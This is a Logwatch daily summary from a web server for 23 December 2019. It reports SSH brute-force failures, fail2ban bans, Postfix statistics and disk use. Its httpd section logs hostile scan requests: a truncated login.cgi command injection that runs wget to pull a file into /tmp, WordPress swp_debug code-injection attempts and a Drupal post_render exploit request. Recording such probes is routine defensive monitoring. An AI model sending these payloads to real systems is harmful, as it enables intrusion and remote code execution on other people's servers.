################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Tue Dec 24 04:42:04 2019
Date Range Processed: yesterday
( 2019-Dec-23 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [162:164]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 3 sites probed the server
172.104.242.173
172.105.4.63
61.219.11.153
Requests with error response codes
400 Bad Request
null: 8 Time(s)
mstshash=Administr: 7 Time(s)
mstshash=hello: 3 Time(s)
/: 2 Time(s)
/login.cgi?cli=aa%20aa%27;wget%20http://18 ... h%20/tmp/kh%27$: 1 Time(s)
/nmaplowercheck1577100860: 1 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 1 Time(s)
zapf.in: 1 Time(s)
403 Forbidden
/resolutionen/sose17/gesellschaftlich_verantwortung/: 1 Time(s)
404 Not Found
/robots.txt: 33 Time(s)
/berlin/apple-touch-icon.png: 18 Time(s)
/wp-login.php: 4 Time(s)
//user/register/?element_parents=account/m ... mat=drupal_ajax: 2 Time(s)
//webconfig.txt.php: 2 Time(s)
//wp-admin/admin-post.php?swp_debug=load_o ... 20%22h1loo1%22;: 2 Time(s)
//wp-admin/admin-post.php?swp_debug=load_o ... wpaa=phpinfo();: 2 Time(s)
////wp-login.php: 1 Time(s)
/985yo1oz19idwrts: 1 Time(s)
/berlin/,: 1 Time(s)
/download/reader_hb02.pdf: 1 Time(s)
/nndgo9b5n0l7fbxl: 1 Time(s)
/sites/all/libraries/elfinder-1.2/elfinder.php.html: 1 Time(s)
/sites/all/libraries/elfinder/__elfinder.php.html: 1 Time(s)
/sites/all/libraries/elfinder/_elfinder.php.html: 1 Time(s)
/sites/default/files/2009_WiSe_M%C3%BCnchen.pdf: 1 Time(s)
/sites/default/files/2014_SoSe_Duesseldorf.pdf: 1 Time(s)
/uefevysst4aoow3o: 1 Time(s)
405 Method Not Allowed
/?q=user%2Fpassword&name%5B%23post_render% ... s%2Fvuln.php%27: 1 Time(s)
500 Internal Server Error
/: 21 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
Invalid Users:
Unknown Account: 28 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
11.628K Bytes accepted 11,907
11.628K Bytes sent via SMTP 11,907
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
1 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
1 Total 4xx Rejects 100.00%
======== ==================================================
1788 Connections
1733 Connections lost (inbound)
1788 Disconnections
1 Removed from queue
1 Sent via SMTP
11 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Network Read Write Errors: 1
Disconnecting after too many authentication failures for user:
root : 172 Time(s)
Failed logins from:
Illegal users from:
undef: 26 times
**Unmatched Entries**
fatal: no matching cipher found: client aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc,none server aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com [preauth] : 6 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/vzfs 400G 241G 160G 61% /
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################